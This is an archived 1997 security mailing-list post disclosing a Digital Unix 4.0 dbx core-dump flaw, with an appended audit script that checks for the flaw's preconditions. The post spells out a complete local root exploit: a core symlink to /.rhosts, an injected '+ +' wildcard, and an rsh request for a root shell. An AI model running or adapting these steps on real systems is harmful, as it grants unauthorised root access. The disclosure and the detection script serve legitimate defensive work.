[480] in Best-of-Security


BoS: digital unix 4.0 hole

daemon@ATHENA.MIT.EDU (John McDonald)
Mon Nov 17 20:52:14 1997

X-Delivering-To: best-of-security-mtg@menelaus.mit.edu
Date: 	Fri, 14 Nov 1997 12:37:20 -0500
Reply-To: John McDonald <jmcdonal@OSPREY.UNF.EDU>
From: John McDonald <jmcdonal@OSPREY.UNF.EDU>
Old-X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
Old-X-Originated-From: From: John McDonald <jmcdonal@OSPREY.UNF.EDU>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au


I've verified this on 3 boxes running Digital Unix 4.0.

If you run dbx (tested on 3.11.10) on a setuid root program that you have
read access to, the program will core dump and create a root-owned, mode 600
core in the current directory. You might have to run dbx one or two times to
get it to work. The message you are looking for is:

dbx version 3.11.10
Type 'help' for help.

warning: /bin/crontab has no symbol table -- very little is supported
without it


Could not attach to process 10112

cannot run program
Exiting due to error during startup

Now, this core dump will follow symlinks, and using the trick mentioned
earlier of embedding "+ +" in a core dump, you can easily grab root:

# The core is written as root through the symlink, so it lands in /.rhosts.
ln -s /.rhosts core
# The environment ends up in the core image; a line consisting only of
# "+ +" is the rhosts wildcard for any host, any user.
BOB42="

+ +

"
export BOB42
# dbx fails to attach and the setuid target dumps core through the symlink.
dbx /bin/crontab
# rshd now accepts everyone, so ask it for a root shell.
rsh -l root localhost /bin/sh -i

I'm not sure this will work on other Digital Unix boxes, and I'm not sure
why it works. So, email me if you get it to work. I'm not sure, but I
think this might be a bug in the process-tracing implementation.

I think this will locate all of the vulnerable setuid binaries:
find / -perm -4004 -print

humble  -  jmcdonal@unf.edu
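The post relies on three things a defender can look for: a setuid binary that is readable by others (which is what dbx needs in order to load it), a symlink named core planted where the setuid program will dump, and a "+ +" wildcard line in /.rhosts. The following POSIX shell script is an added example and not part of John McDonald's post; it packages those checks as functions. The function names, the script name and the sample paths are my own.

```shell
#!/bin/sh
# Added example, not from the original post: audit helpers for the three
# conditions the dbx core-dump trick above depends on. Names are my own.

# 1. Setuid files readable by others under $1: the same predicate as the
#    post's "find / -perm -4004", limited to one tree so it is quick to run.
find_readable_setuid() {
    find "$1" -type f -perm -4004 -print 2>/dev/null | sort
}

# 2. Symlinks named "core" under $1, printed with their targets. A core
#    symlink pointing at a root-owned file is the setup step of the attack.
find_core_symlinks() {
    find "$1" -type l -name core -exec sh -c \
        'printf "%s -> %s\n" "$1" "$(readlink "$1")"' _ {} \; 2>/dev/null | sort
}

# 3. Does the rhosts file $1 contain a "+ +" (any host, any user) line?
#    rshd reads the file line by line, so one such line buried in core-dump
#    garbage is enough. NULs are stripped first so grep examines every line
#    instead of giving up on a binary file; surrounding blanks are allowed.
rhosts_has_wildcard() {
    tr -d '\000' < "$1" |
        grep -q '^[[:space:]]*+[[:space:]][[:space:]]*+[[:space:]]*$'
}

# Stand-alone use (hypothetical script name): audit.sh <tree> [rhosts-file ...]
if [ "$#" -gt 0 ]; then
    tree=$1; shift
    echo "== world-readable setuid files under $tree"
    find_readable_setuid "$tree"
    echo "== core symlinks under $tree"
    find_core_symlinks "$tree"
    for f in "$@"; do
        if rhosts_has_wildcard "$f"; then
            echo "!! $f grants rsh access to everyone (+ +)"
        else
            echo "ok $f"
        fi
    done
fi
```

Run it as `sh audit.sh / /.rhosts` on a box you suspect; scanning the whole filesystem takes a while, and on a machine that has already been hit the interesting output is a root-owned /.rhosts that looks like binary garbage but still satisfies the third check, because rshd only needs the one clean line.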
